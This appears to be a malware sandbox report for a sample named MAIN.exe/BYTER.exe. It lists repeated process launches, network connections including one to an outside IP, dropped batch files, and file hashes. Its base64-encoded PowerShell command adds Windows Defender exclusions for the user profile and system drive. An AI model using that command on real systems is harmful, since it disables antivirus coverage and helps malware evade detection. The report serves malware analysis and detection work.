"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

Network

Country Destination Domain Proto
N/A 10.0.2.15:9090 tcp
N/A 10.0.2.15:9090 tcp
US 147.185.221.19:52033 tcp
N/A 10.0.2.15:9090 tcp
N/A 10.0.2.15:9090 tcp

Files

\Users\Admin\AppData\Local\Temp\MAIN.exe

MD5 b8ccfc163e2d56a73b6fd7387a45e6eb
SHA1 f81a368c275574fa808a92d29c5e0b37e01162ce
SHA256 8386fa61b6c5f873c692fbd3b394851ec714e5c852898ef6f622035e4d3d5e84
SHA512 8ea7d2ee4fa1f737e7c77dda98963a1c9d3a3276ab0d0d327b5df41682da91996e2e17cbfdb99ddf9399a819c6ec9cdde18b6a8fe6cf221960103b34acb21faf

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 80a1700a1556374636b66f0cf37fb896
SHA1 06c4e78e889740484af9dc317994911874898839
SHA256 4e6154400b917feef1d2669c1d0689f3cd6a9efca027ef609bc899d1a701774d
SHA512 efad1f00f5fa05c7542ea298c5cbd37c4d0614857bb060dab9724757921edb5f466000a5addc8dc12ef732cbe8fe80f7e29b271feb7944890a00825969646203

memory/3064-10-0x0000000000840000-0x0000000000858000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

\??\PIPE\srvsvc

C:\Users\Admin\AppData\Local\Temp\tmp4CB9.tmp.bat

C:\Users\Admin\AppData\Local\Temp\tmp70DC.tmp.bat

C:\Users\Admin\AppData\Local\Temp\tmp8057.tmp.bat
